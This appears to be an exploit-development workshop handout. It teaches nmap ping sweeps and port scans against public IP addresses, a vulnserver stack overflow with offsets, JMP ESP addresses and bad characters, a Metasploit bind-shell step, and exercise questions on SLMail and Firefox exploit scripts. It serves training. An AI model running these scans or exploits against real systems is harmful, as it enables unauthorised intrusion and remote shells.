Exploit Dev Process

1. Skill Level 1: (Can identify vulnerable hosts - KNOWN VULNERABILITIES)
2. ----------------------------------------------------------------------
3. - Ping Sweep
4. - Port Scan
5. - Bannergrab
6. - Vulnerability Research
7.  
8.  
9. ########################
10. # Scanning Methodology #
11. ########################
12.  
13. - Ping Sweep
14. What's alive?
15. ------------
16.  
17. ---------------------------Type This-----------------------------------
18. sudo nmap -sP 157.166.226.*
19.  
20. -----------------------------------------------------------------------
21.  
22.  
23.  
24. -if -SP yields no results try:
25. ---------------------------Type This-----------------------------------
26. sudo nmap -sL 157.166.226.*
27.  
28. -----------------------------------------------------------------------
29.  
30.  
31.  
32. -Look for hostnames:
33. ---------------------------Type This-----------------------------------
34. sudo nmap -sL 157.166.226.* | grep com
35.  
36. -----------------------------------------------------------------------
37.  
38.  
39.  
40. - Port Scan
41. What's where?
42. ------------
43. ---------------------------Type This-----------------------------------
44. sudo nmap -sS 162.243.126.247
45.  
46. -----------------------------------------------------------------------
47.  
48.  
49.  
50. - Bannergrab/Version Query
51. What versions of software are running
52. -------------------------------------
53.  
54. ---------------------------Type This-----------------------------------
55. sudo nmap -sV 162.243.126.247
56.  
57. -----------------------------------------------------------------------
58.  
59.  
60.  
61.  
62. - Vulnerability Research
63. Lookup the banner versions for public exploits
64. ----------------------------------------------
65. http://exploit-db.com
66. http://securityfocus.com/bid
67. https://packetstormsecurity.com/files/tags/exploit/
68.  
69.  
70.  
71.  
72.  
73.  
74.  
75. Skill Level 2: Can identify UNKNOWN VULNERABILITIES)
76. ----------------------------------------------------
77. 1. App Type
78. - Stand Alone
79. - Client-Server (app name: vulnserver.exe)
80. - Web App
81.  
82. 2. Data Input Type
83. - File/Keyboard/Mouse (Stand Alone)
84. - Logical Network Port (Client-Server) (tcp port: 9999)
85. - Browser (Web App)
86.  
87.  
88. 3a. Map and fuzz all app entry points
89. - Methods
90. - Functions
91. - Subroutines
92. - Controllers
93. - Commands
94. HELP
95. STATS [stat_value]
96. RTIME [rtime_value]
97. LTIME [ltime_value]
98. SRUN [srun_value]
99. TRUN [trun_value]
100. GMON [gmon_value]
101. GDOG [gdog_value]
102. KSTET [kstet_value]
103. GTER [gter_value]
104. HTER [hter_value]
105. LTER [lter_value]
106. KSTAN [lstan_value]
107. EXIT
108.  
109. 3b. Fuzz each app entry point
110.  
111.  
112. 4. Isolate the crash
113. - TRUN 2100 is where the app crashes once placed in OllyDBG
114.  
115.  
116.  
117. 5. Calculate distance to EIP
118. - Distance to EIP is 2006 bytes
119.  
120.  
121.  
122. 6. Redirect program execution
123. - JMP REG (example: JMP ESP)
124. - PUSH REG; RET (PUSH EST; RET)
125. - CALL REG; (CALL ESP)
126. "\x91\xC8\x41\x7E" # CALL EDI - user32.dll
127. - Land in dummy shellcode
128.  
129.  
130. 7. Replace dummy shellcode with real shellcode
131. - Bad characters
132. \x00\x0a\x2f\x5c
133. - Not enough space
134. 243 bytes for shellcode
135.  
136.  
137.  
138.  
139. --------------------------------------------------------------------------------------------------------------------------------
140.  
141.  
142.  
143.  
144. #################################
145. ----------- ############### # Intro to Exploit Development ################ -----------
146. #################################
147. - You can download everything you need for this exercise (except netcat) from the link below
148. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
149.  
150. - Extract this zip file to your Desktop
151.  
152. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
153.  
154. - Open a new command prompt and type:
155. nc localhost 9999
156.  
157. - In the new command prompt window where you ran nc type:
158. HELP
159.  
160. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
161. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
162.  
163. - Now double-click on 1-simplefuzzer.py
164. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
165.  
166.  
167. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
168.  
169. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
170.  
171. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
172.  
173. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
174.  
175. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
176.  
177. - Calculate the distance to EIP by running script 3-3000chars.py
178. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
179.  
180. 4-count-chars-to-EIP.py
181. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
182. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
183.  
184. 5-2006char-eip-check.py
185. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
186.  
187. 6-jmp-esp.py
188. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
189.  
190. 7-first-exploit
191. - In this script we actually do the stack overflow and launch a bind shell on port 4444
192.  
193. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
194.  
195.  
196. ------------------------------
197.  
198. cd ~/toolz/metasploit/modules/exploits/windows/misc
199.  
200. vi vulnserv.rb (paste the code into this file)
201.  
202.  
203.  
204. cd ~/toolz/metasploit
205.  
206. ./msfconsole
207.  
208.  
209.  
210. use exploit/windows/misc/vulnserv
211. set PAYLOAD windows/meterpreter/bind_tcp
212. set RHOST 192.168.88.129
213. set RPORT 9999
214. exploit
215.  
216.  
217.  
218. -------------------------------------------------------------------------------------------------------------------------
219. The first exploit
220. https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
221.  
222. SLMail Scripts Questions
223.  
224. SLmail1.py
225. How do you start SLMail?
226. What do you have to be careful of when attaching your debugger to the application?
227. How many As are you sending to the application?
228.  
229. SLmail2.py
230. What tool(s) can be used to generate a cyclic pattern?
231. What port are we attacking?
232. What verb are we attacking?
233.  
234. SLmail3.py
235. What is the value contained in EIP?
236. What is the portion of the cyclic pattern that we must search for?
237. What is the distance to EIP?
238.  
239. SLmail4.py
240. What do you overwrite EIP with in this script?
241. What is the length of your shellcode in this script?
242. What is the difference between SOCK_STREAM and SOCK_DGRAM?
243.  
244. SLmail5.py
245. What is struct.pack and why are we using it?
246. What where is our JMP ESP coming from?
247. What is the length of our shellcode in this script?
248.  
249. SLmail6.py
250. Why do you subtract the top of ESP from the bottom of ESP in this script?
251. What is the length of our shellcode in this script?
252. What is the distance to EIP in this script?
253.  
254.  
255. SLmail7.py
256. How do you test for bad characters?
257. What are the bad characters in this script?
258. What is the address of the JMP ESP in this script and what DLL does it come from?
259.  
260.  
261. SLmail8.py
262. What is DEP and how do you disable it?
263. What is the purpose of the stack adjustment?
264. What is the purpose of the NOP sled?
265.  
266.  
267. If you got through SLMail comfortably - then try the script below.
268. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
269.  
270.  
271.  
272.  
273.  
274. -------------------------------------------------------------------------------------------------------------------------
275.  
276.  
277. Analysis of the exploit code:
278. https://www.exploit-db.com/exploits/15689/
279. What is the target platform that this exploit works against?
280. What is the variable name for the distance to EIP?
281. What is the actual distance to EIP in bytes?
282. Describe what is happening in the variable ‘junk2’?
283.  
284. Analysis of the training walk-through based on EID: 15689:
285. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
286.  
287. ff1.py
288. What does the sys module do?
289. What is sys.argv[1] and sys.argv[2]?
290. What application entry point is being attacked in this script?
291.  
292. ff2.py
293. Explain what is happening in lines 18 - 20
294. What is pattern_create.rb doing and where can I find it?
295. Why can’t I just double click the file to run this script?
296.  
297. ff3.py
298. Explain what is happening in lines 17 - to 25?
299. Explain what is happening in lines 30 - to 32?
300. Why is everything below line 35 commented out?
301.  
302. ff4.py
303. Explain what is happening in lines 13 - to 15.
304. Explain what is happening in line 19.
305. Why is everything below line 35 commented out?
306.  
307. Ff5.py
308. Explain what is happening in line 15.
309. What is struct.pack?.
310. How big is the shellcode in this script?
311.  
312. ff6.py
313. What is the distance to EIP?
314. How big is the shellcode in this script?
315. What is the total byte length of the data being sent to this app?
316.  
317. ff7.py
318. What is a tuple in python? Unchangeable list
319. How big is the shellcode in this script? 1000 Bytes
320. Did your app crash in from this script? No
321.  
322. ff8.py
323. How big is the shellcode in this script?
324. What is try/except in python?
325. What is socket.SOCK_STREAM in Python?
326.  
327. ff9.py
328. What is going on in lines 19 and 20?
329. What is the length of the NOPs?
330. What is socket.SOCK_STREAM in Python?
331.  
332. ff010.py
333. What is going on in lines 18 - 20?
334. How would a stack adjustment help this script?